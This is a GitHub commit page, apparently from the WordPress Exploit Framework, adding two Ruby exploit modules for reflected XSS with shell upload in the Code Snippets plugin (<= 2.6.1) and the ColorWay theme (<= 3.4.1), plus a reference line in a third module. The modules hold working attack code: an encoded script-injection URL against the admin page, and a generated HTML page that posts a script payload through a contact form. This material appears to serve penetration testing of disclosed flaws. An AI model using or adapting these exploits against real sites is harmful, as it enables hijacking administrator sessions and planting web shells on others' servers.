Skip to content
This repository was archived by the owner on Oct 22, 2020. It is now read-only.

Commit 73328b1

Browse files
committed
Merged development into master
2 parents 151eb7c + 6769574 commit 73328b1

File tree

3 files changed

+78
-0
lines changed

3 files changed

+78
-0
lines changed
Lines changed: 32 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,32 @@
1+
class Wpxf::Exploit::CodeSnippetsReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::ReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'Code Snippets <= 2.6.1 Reflected XSS Shell Upload',
9+
author: [
10+
'Burak Kelebek', # Discovery
11+
'Rob Carr <rob[at]rastating.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8566'],
15+
['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_in_code_snippets_wordpress_plugin.html']
16+
],
17+
date: 'Jul 24 2016'
18+
)
19+
end
20+
21+
def check
22+
check_plugin_version_from_readme('code-snippets', '2.7')
23+
end
24+
25+
def vulnerable_url
26+
normalize_uri(wordpress_url_admin, 'admin.php')
27+
end
28+
29+
def url_with_xss
30+
"#{vulnerable_url}?page=snippets&tag=%5C%5C%27%3E%3Cscript%3E#{xss_ascii_encoded_include_script}%3C%2Fscript%3E"
31+
end
32+
end
Lines changed: 45 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,45 @@
1+
class Wpxf::Exploit::ColorwayReflectedXssShellUpload < Wpxf::Module
2+
include Wpxf::WordPress::StagedReflectedXss
3+
4+
def initialize
5+
super
6+
7+
update_info(
8+
name: 'ColorWay <= 3.4.1 Reflected XSS Shell Upload',
9+
author: [
10+
'Yorick Koster', # Discovery and disclosure
11+
'Rob Carr <rob[at]rastating.com>' # WPXF module
12+
],
13+
references: [
14+
['WPVDB', '8568'],
15+
['URL', 'https://sumofpwn.nl/advisory/2016/cross_site_scripting_vulnerability_in_colorway_wordpress_theme.html']
16+
],
17+
date: 'Jul 26 2016'
18+
)
19+
20+
register_option(
21+
StringOption.new(
22+
name: 'contact_url',
23+
desc: 'The URL of a contact form',
24+
required: true
25+
)
26+
)
27+
end
28+
29+
def check
30+
check_theme_version_from_style('colorway', '3.4.2')
31+
end
32+
33+
def initial_script
34+
%|<html><head></head><body><script>
35+
#{js_post}
36+
post('#{datastore['contact_url']}', {
37+
contactName: "\\"><script>#{xss_include_script}<\\/script>",
38+
email: '#{Utility::Text.rand_alpha(5)}',
39+
comments: '',
40+
submitted: 'true'
41+
});
42+
</script></body></html>
43+
|
44+
end
45+
end

modules/exploits/woo_custom_checkout_field_xss_shell_upload.rb

Lines changed: 1 addition & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -10,6 +10,7 @@ def initialize
1010
'Rob Carr <rob[at]rastating.com>' # Disclosure + WPXF module
1111
],
1212
references: [
13+
['WPVDB', '8567'],
1314
['URL', 'http://blog.rastating.com/woo-custom-checkout-field-1-3-2-csrf-stored-xss-disclosure']
1415
],
1516
date: 'Jul 23 2016'

0 commit comments

Comments
 (0)